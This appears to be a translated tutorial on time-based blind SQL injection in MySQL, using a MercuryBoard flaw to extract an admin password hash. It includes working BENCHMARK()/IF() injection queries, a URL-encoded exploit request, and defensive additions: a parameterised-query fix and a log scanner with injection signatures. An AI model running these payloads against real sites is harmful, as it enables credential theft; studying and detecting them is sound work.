Author: Zeelock
Translator: Floating Dust [S.S.T] (www.cnsst.net)
Note: the translator holds the copyright of the Chinese version of this article. The Chinese version was first published by the Script Security team and then submitted to the information security forum; copyright belongs to the Script Security team and to Floating Dust [S.S.T].
Keywords: BENCHMARK(), IF(), blind injection, time delay, WAITFOR
"Validate anything that can be passed. Security lies in the inputs." -zk
"Every filter can be broken through. Security depends on the input." -zk
Abstract:
Exploiting SQL injection in MySQL databases is not easy: a UNION between columns of different data types fails, and there is no way to provoke a visible error message from a parameter passed into a query. When auditing php/MySQL application code we often find an injection vulnerability that does not seem to be exploitable. This happens frequently, because we cannot see the output of the query before the script ends, or all we see is an error message, or the value retrieved is passed on to several other queries through different tables. For these reasons a SELECT ... UNION is not enough.
The injection toolbox
When there is no error message, a typical injection uses UNION SELECT [null, null, ...] to find the number of columns selected by the original query, so that we can go further. If no output is displayed at all, it is almost impossible to retrieve any content, even when we know the exact name of every column in every table.
Below is an example based on a vulnerability in MercuryBoard, found by codebug.org and considered not exploitable. I will show step by step how to retrieve the administrator's password hash through this vulnerability.
I assume the table names are known (a reasonable assumption when an open-source script is being audited, or when a default debugging option is active).
The vulnerability
MercuryBoard v1.1.0: post.php contains an SQL injection vulnerability in the parameter t when the action is set to reply, and the error message it returns reveals it.
A logged-in user triggers the error with the following request:
http://www.site.com/mercuryboard...&s=reply&t=1
This result does not seem to be usable.
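As an added illustration (this is not MercuryBoard's post.php, nor code from the article), the pattern behind this kind of vulnerability and its fix, shown against an in-memory SQLite database: the vulnerable function splices the t parameter straight into the query text, while the hardened version whitelists the parameter's shape and binds it. The table layout, the row contents (the hash is md5('password')) and the function names are my assumptions.

```python
import re
import sqlite3


# Constructed in-memory schema that mirrors the mb_topics / mb_users tables used
# on this page; it is an illustration, not MercuryBoard's real schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mb_topics (topic_id INTEGER PRIMARY KEY, topic_title TEXT)")
    conn.execute("CREATE TABLE mb_users (user_id INTEGER PRIMARY KEY, user_password TEXT, user_group INTEGER)")
    conn.executemany("INSERT INTO mb_topics VALUES (?, ?)", [(1, "Welcome"), (2, "Staff only")])
    # Constructed admin row: the hash is md5('password'), not a value from the article.
    conn.execute("INSERT INTO mb_users VALUES (1, ?, 1)", ("5f4dcc3b5aa765d61d8327deb882cf99",))
    conn.commit()
    return conn


def topic_title_vulnerable(conn, t):
    """The flawed pattern: the raw GET parameter t is spliced into the SQL text."""
    sql = f"SELECT topic_title FROM mb_topics WHERE topic_id = {t}"
    return [row[0] for row in conn.execute(sql)]


def topic_title_fixed(conn, t):
    """Hardened: whitelist the parameter shape, then bind it instead of interpolating."""
    if not re.fullmatch(r"[0-9]{1,10}", t):
        raise ValueError("topic id must be a decimal integer")
    sql = "SELECT topic_title FROM mb_topics WHERE topic_id = ?"
    return [row[0] for row in conn.execute(sql, (int(t),))]


if __name__ == "__main__":
    db = make_db()
    payload = "1 UNION SELECT user_password FROM mb_users WHERE user_group = 1"
    print(topic_title_vulnerable(db, "1"))              # ['Welcome']
    print(sorted(topic_title_vulnerable(db, payload)))  # the admin hash leaks beside the title
    try:
        topic_title_fixed(db, payload)
    except ValueError as err:
        print("rejected:", err)
```

Binding alone would already defeat the UNION, because the whole payload becomes one string value that never matches an integer topic_id; the explicit shape check on top of it is what turns a silent empty result into a logged rejection, which is what a defender wants to see in the application log.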
Preparing for blind injection
First, install the vulnerable MercuryBoard version using a database user with low privileges.
--- Database name: mercuryboard --- (show the table names)
mysql> show tables;
+-------------------+
| Tables_in_mercury |
+-------------------+
| mb_active         |
| mb_attach         |
| mb_forums         |
| mb_groups         |
| mb_help           |
| mb_logs           |
| mb_membertitles   |
| mb_pmsystem       |
| mb_posts          |
| mb_replacements   |
| mb_settings       |
| mb_skins          |
| mb_subscriptions  |
| mb_templates      |
| mb_topics         |
| mb_users          |
| mb_votes          |
+-------------------+
17 rows in set (0.00 sec)
--- The current user is an ordinary user --- (not running as root)
mysql> select user();
+---------------+
| user()        |
+---------------+
| 123@localhost |
+---------------+
1 row in set (0.00 sec)
mysql> SELECT password, USER() FROM mysql.user;
ERROR 1142: select command denied to user: 123@localhost for table user
mysql>
--- The following query displays the first byte of the administrator's hash ---
mysql> select substring(user_password,1,1) FROM mb_users WHERE user_group = 1;
+------------------------------+
| substring(user_password,1,1) |
+------------------------------+
| 5                            |
+------------------------------+
1 row in set (0.00 sec)
--- And this is the ASCII code of that first byte ---
mysql> select ascii(5);
+----------+
| ascii(5) |
+----------+
|       53 |
+----------+
1 row in set (0.00 sec)
Making the difference
The goal is to find a way to make the query behave differently when the content we are looking for is correct. How can we know whether the first byte of the administrator's hash is equal to 5? In the NGSS paper, when the content matches the injected condition, the author simply delays the query. In MSSQL this is done by appending a condition of the form IF [QUERY] WAITFOR [TIME]; MySQL does not support WAITFOR.
In the following query I use the IF() function together with the BENCHMARK() function to create a delay of about 5 seconds. The current low-privileged user can execute it (if you can SELECT, you can call BENCHMARK()).
--- Passing a wrong value --- (CHAR(52) is equal to '4')
mysql> select active_id FROM mb_active union select if(SUBSTRING(user_password,1,1)=CHAR(52),BENCHMARK(5000000,ENCODE('Slow Down','by 5 seconds')),null) FROM mb_users WHERE user_group = 1;
+-----------+
| active_id |
+-----------+
|         3 |
|         0 |
+-----------+
2 rows in set (0.00 sec)
In the example above the BENCHMARK() function was not executed (0.00 sec).
--- Passing the matching value --- (BENCHMARK() is executed)
mysql> select active_id FROM mb_active union select if(SUBSTRING(user_password,1,1)=CHAR(53),BENCHMARK(5000000,ENCODE('Slow Down','by 5 seconds')),null) FROM mb_users WHERE user_group = 1;
+-----------+
| active_id |
+-----------+
|         3 |
|         0 |
+-----------+
2 rows in set (5.36 sec)
In the example above the BENCHMARK() function ran and delayed the response by 5.36 seconds.
Adapting the GET request
To inject the SQL commands successfully, we have to get rid of every single quote in the request.
--- Without single quotes ---
mysql> select active_id FROM mb_active union select if(SUBSTRING(user_password,1,1)=CHAR(53),BENCHMARK(1000000,MD5(CHAR(1))),null) FROM mb_users WHERE user_group = 1;
+-----------+
| active_id |
+-----------+
|         3 |
|         0 |
+-----------+
2 rows in set (4.65 sec)
mysql>
Exploiting the vulnerability
First, log in as a registered user.
http://127.0.0.1/mercuryboard/in...UNION%20SELECT%20IF(SUBSTRING(user_password,1,1)%20=%20CHAR(53),BENCHMARK(1000000,MD5(CHAR(1))),null),null%20FROM%20mb_users%20WHERE%20user_group%20=%201/*
We can see that the first byte is CHAR(53), that is '5', because the response is delayed by about 2 seconds.
Brute force
Now the hash has to be rebuilt one character at a time. A simple Perl script issues the GET request and waits, byte by byte: {... SUBSTRING(str, n, 1) ...}. If the response is delayed by 7-10 seconds, we have the right character.
Brute-forcing an MD5 hash means 32 bytes, each of which is one of:
0 to 9 --> ASCII 48 to 57
a to z --> ASCII 97 to 122
The worst case is 36 requests per byte, about 3 seconds per request, with the extra latency marking the correct byte. The complete hash therefore takes ((3*35)+10)*32 = 3622 seconds (about 1 hour).
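The three sections above (the IF()/BENCHMARK() delay, the quote-free GET request and the byte-by-byte brute force) have a distinctive footprint in a web server's access log: the same script hit repeatedly from one address, query-string values containing BENCHMARK( or IF(SUBSTRING(, and a small fraction of those requests taking seconds longer than the rest. As an added example that is not part of the original article, the Python scanner below runs that detection over constructed access-log lines in the shape of Apache's `%h %t "%r" %>s %D` format (the last field being the request duration in microseconds). The sample lines, the SLOW_SECONDS threshold and the function names are my assumptions; the injected values in the sample mirror the queries shown on this page.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines in the shape of Apache's
#   LogFormat "%h %t \"%r\" %>s %D"
# where %D is the request duration in microseconds. Made-up traffic, not a real
# capture; the injected t values mirror the queries shown in the article.
SAMPLE_LOG = """\
10.0.0.7 [10/Oct/2005:13:55:36 +0000] "GET /mercuryboard/post.php?a=post&s=reply&t=1 HTTP/1.1" 200 41230
10.0.0.7 [10/Oct/2005:13:55:40 +0000] "GET /mercuryboard/post.php?a=post&s=reply&t=1%20UNION%20SELECT%20IF(SUBSTRING(user_password,1,1)%3DCHAR(52),BENCHMARK(1000000,MD5(CHAR(1))),null),null%20FROM%20mb_users%20WHERE%20user_group%3D1/* HTTP/1.1" 200 52310
10.0.0.7 [10/Oct/2005:13:55:41 +0000] "GET /mercuryboard/post.php?a=post&s=reply&t=1%20UNION%20SELECT%20IF(SUBSTRING(user_password,1,1)%3DCHAR(53),BENCHMARK(1000000,MD5(CHAR(1))),null),null%20FROM%20mb_users%20WHERE%20user_group%3D1/* HTTP/1.1" 200 4650000
10.0.0.9 [10/Oct/2005:13:56:02 +0000] "GET /mercuryboard/index.php HTTP/1.1" 200 38000
10.0.0.9 [10/Oct/2005:13:56:09 +0000] "GET /mercuryboard/search.php?q=benchmark+results HTTP/1.1" 200 3900000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<us>\d+)$'
)

# Tokens that identify time-delay or UNION-based injection attempts. Each pattern
# requires the function's opening parenthesis (or the full WAITFOR DELAY phrase),
# so an ordinary search for "benchmark results" is not flagged.
SIGNATURES = [
    ("benchmark", re.compile(r"\bBENCHMARK\s*\(", re.I)),
    ("sleep", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("waitfor", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    ("conditional-substring", re.compile(r"\bIF\s*\(\s*SUBSTRING\s*\(", re.I)),
    ("union-select", re.compile(r"\bUNION\s+SELECT\b", re.I)),
]

SLOW_SECONDS = 2.0  # assumed threshold; tune to the application's normal response time


def decoded_values(target):
    """Return the URL-decoded query-string values of a request target."""
    query = urlsplit(target).query
    return [value for _, value in parse_qsl(query, keep_blank_values=True)]


def scan_line(line):
    """Return a finding dict for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = []
    for value in decoded_values(m["target"]):
        for name, pattern in SIGNATURES:
            if pattern.search(value) and name not in hits:
                hits.append(name)
    if not hits:
        return None
    seconds = int(m["us"]) / 1_000_000
    return {
        "ip": m["ip"],
        "time": m["ts"],
        "seconds": seconds,
        "signatures": hits,
        # A signature hit plus an abnormally slow response is the fingerprint of a
        # successful probe: the true branch of the injected IF() ran BENCHMARK().
        "delay_observed": seconds >= SLOW_SECONDS,
    }


def scan_log(text):
    """Scan a whole log and return the findings in file order."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


def summarize_by_ip(findings):
    """Count flagged requests and delayed responses per source address."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(f["ip"], {"requests": 0, "delayed": 0})
        entry["requests"] += 1
        entry["delayed"] += int(f["delay_observed"])
    return summary


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        flag = "DELAY" if f["delay_observed"] else ""
        print(f["time"], f["ip"], f"{f['seconds']:.2f}s", f["signatures"], flag)
    print(summarize_by_ip(results))
```

The per-address summary is the useful alert: one client producing dozens of flagged requests, roughly one in thirty-six of them slow, is exactly the brute-force loop the article describes, and the delayed ones even reveal which guesses the attacker got right. The slow search on 10.0.0.9 is deliberately left unflagged; response time on its own is too noisy to alert on without a payload signature.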
Conclusion
MySQL can be blind-injected as well.
Original English version: Blind Injection in MySQL Databases
Source: http://forum.eviloctal.com/read-htm-tid-8313.html